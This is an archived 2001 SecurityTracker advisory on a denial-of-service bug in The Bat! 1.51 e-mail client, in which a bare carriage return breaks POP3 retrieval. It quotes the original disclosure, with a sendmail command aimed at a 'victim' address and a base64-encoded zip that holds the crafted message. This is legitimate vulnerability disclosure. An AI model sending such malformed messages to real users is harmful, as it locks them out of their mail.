SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   The Bat! Vendors:   RIT Research Labs
RitLab's The Bat! E-Mail Client Allows a User's E-Mail to Be Made Unretrievable When Downloading a Specifically Formatted E-Mail Message
SecurityTracker Alert ID:  1001378
SecurityTracker URL:  http://securitytracker.com/id/1001378
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 20 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.51
Description:   SECURITY.NNOV reports that there is a vulnerability in The Bat! e-mail client that allows a remote user to send mail to a vulnerable e-mail client causing the client to be unable to retrieve further messages when the e-mail is retrieved.

While RETRiving messages via the POP3 e-mail protocol, The Bat! incorrectly processes the 0x0D (Carriage Return) character if it is not followed immediately by a 0x0A (Line Feed) character. The Bat! reportedly incorrectly interprets this event as the end of the message and the remaineder of the message is incorrectly interpreted as a reply from the POP3 e-mail server. As a result, The Bat! fails to receive the rest of the messages in the user's mailbox and will not delete received messages from the mail server.

Futhermore, malformed message could emulate any POP3 server replies, causing the potential for mischief.

A demonstration exploit is contained in the source message.

The vendor has reportedly been notified.

Impact:   A remote user can send mail to a vulnerable e-mail client causing the client to be unable to retrieve further messages when the e-mail is retrieved.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.ritlabs.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Disputes Vulnerability) Re: RitLab's The Bat! E-Mail Client Allows a User's E-Mail to Be Made Unretrievable When Downloading a Specifically Formatted E-Mail Message
The vendor disputes the claim of a vulnerability.
(Author Reiterates Vulnerability Claims) Re: RitLab's The Bat! E-Mail Client Allows a User's E-Mail to Be Made Unretrievable When Downloading a Specifically Formatted E-Mail Message
The author of the original advisory refutes the vendor's claim that the demonstration exploit code was not RFC compliant.
(Vendor Releases Fix) Re: RitLab's The Bat! E-Mail Client Allows a User's E-Mail to Be Made Unretrievable When Downloading a Specifically Formatted E-Mail Message
The vendor has posted a fix.



 Source Message Contents

Subject:  SECURITY.NNOV: The Bat! <cr> bug


------------11191C1F46A565
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


There  is more fun then security impact in this issue, but it's a kind
of DoS and can give a lot of headache to postmasters.

=-------8<----------------------------------

SECURITY.NNOV URL:     http://www.security.nnov.ru
Topic:                  The Bat! <cr> bug
Application:            The Bat! 1.51 (latest)
Vendor:                 RitLabs
Category:               Denial of Service
Risk Factor:            Low
Remote:                 Yes
Vendor Contacted:       13.04.2001
Software URL:          http://www.thebat.net
Vendor URL:            http://www.ritlabs.com

+Introduction:

 The  Bat!  Is  very  convenient commercially available MUA for Windows
 with lot of features.

+Details:

 While  RETRiving  message  via  POP3  (IMAP  isn't  tested)  The Bat!
 incorrectly  processes  0x0D  (CR)  character if it's not followed by
 0x0A (LF). The Bat! incorrectly calculates end of the message and the
 part  of message is treated as reply from POP3 server. The Bat! fails
 to  receive  the  rest  of  the messages and fails to delete received
 messages  from server. This leads to DoS against user's POP3 account.
 Malformed message can emulate any POP3 server replies.

+Exploitation:

 Extract attached "badmessage" and send it, e.g. using

   cat badmessage | sendmail -U victim@somewhere.net

 or copy it to user's mailbox.
 This message causes The Bat! to show something like:

   !13.04.2001, 17:51:01: FETCH - Server reports error. The response is: --ERR Wrong User: replace user with your system administrator--

 message is crafted to do not contain this text somewhere in the body.

+Workaround:

 use  "Dispatch  Mail  on  Server" feature to delete malformed message
 from server or use different MUA.


+Solution:

 No yet.

+Vendor:

 RitLabs  was  contacted  on April, 13 (happy Easter to you, guys). No
 feedback yet.

This  advisory  is being provided to you under RFPolicy v.2 documented
at http://www.wiretrip.net/rfp/policy.html.


--
http://www.security.nnov.ru
         /\_/\
        { . . }     |\
+--oQQo->{ ^ }<-----+ \
|  3APA3A  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)
------------11191C1F46A565
Content-Type: application/x-zip-compressed; name="badmess.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="badmess.zip"

UEsDBBQAAAAIACCPjSoKbVmJuAEAAAMEAAAHACQAYmFkbWVzcwoAIAAAAAAAAQAYAAAeNJwhxMAB
wOLkTyLEwAHAstHPG8TAAa1S32/TMBB+5iT+h2NPTCOpna0QvFGtbB0qUgC1KTy7idcaGjvyj7H8
99hRtAmx9mVYebBz39333d13Y3SDSq913V1aUXkjXZcqpe9S47Hcepy2BmmGdMwIZdk7zAihcM2d
YDH8JsYiJP5+BJ2QM0LwdbG8PobIwPZRQCGs5RuRzGuGF7EIOaMZpYSm36ZTQrNx/k/OBK60ckK5
pDRc2VthkpmqdC3VhmG+lg5KvZ9w6dc/ReWCemEdNoEeinkxS74LY6VWDGlKHgm6NvTZ+J2TLTdu
1Mh7UZ/Di7X2quam+3A0Wyzwh9FqgysrDEMj2h2vBPrwwt/SbbHT3qDtrBMN8rqRSlpnuNPmCJaO
O28ZrgDKrbQYPo69GqEq3lq/C3Oue5FhRpAkz2D7uycn7t0o5Ep1YJi/tMwTA4AIZcA/6PifQoaa
I3Nb5Vl2fkBNv1mY9IZtAyS1lUyGrb6yXNVdvLi41SeM+/awcU8ZIeyU4gnJonE/FWV/O97rT5J+
mU4zkufj/P1lJJ3AzeJrMdjqYo/7JrBcffw8uyoH3Esc7AgA89C4UXw3RJ46+IBxAyaFZ24jSeAP
UEsBAhkAFAAAAAgAII+NKgptWYm4AQAAAwQAAAcAAAAAAAAAAAAgAAAAAAAAAGJhZG1lc3NQSwUG
AAAAAAEAAQA1AAAAAQIAAAAA

------------11191C1F46A565--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC